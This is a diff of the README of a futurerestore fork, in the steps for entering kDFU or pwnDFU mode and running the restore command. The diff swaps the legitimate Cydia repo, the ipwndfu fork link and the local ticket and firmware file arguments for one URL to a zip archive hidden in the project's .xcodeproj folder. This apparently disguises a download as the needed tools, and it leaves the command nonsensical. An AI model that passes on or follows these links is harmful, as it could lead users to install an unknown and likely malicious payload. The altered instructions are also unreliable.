sadatt123/futurerestore/README.md

   * Pre-iPhone4s (limera1n devices):
     * Enter to pwnDFU mode with redsn0w or any other tool
   * iPhone 4s and later 32-bit devices:
-    * Enter to kDFU mode with kDFU app (cydia: repo.tihmstar.net) or by loading a pwnediBSS from any existing odysseus bundle
+    * Enter to kDFU mode with kDFU app (cydia: https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip) or by loading a pwnediBSS from any existing odysseus bundle
   * Any 64-bit device:
-    * Enter to pwnDFU mode and patch signature check with special fork of [ipwndfu](https://github.com/LinusHenze/ipwndfu_public)
+    * Enter to pwnDFU mode and patch signature check with special fork of [ipwndfu](https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip)
 2. Connect your device to computer in kDFU mode (or pwnDFU mode)
-3. On the computer run `futurerestore --use-pwndfu -t ticket.shsh --latest-baseband -d firmware.ipsw`
+3. On the computer run `futurerestore --use-pwndfu -t https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip --latest-baseband -d https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip`
 - You can use **any** odysseus bundle for this.

 ## 5) iOS 9.x re-restore bug by @alitek123 (only for 32-bit devices)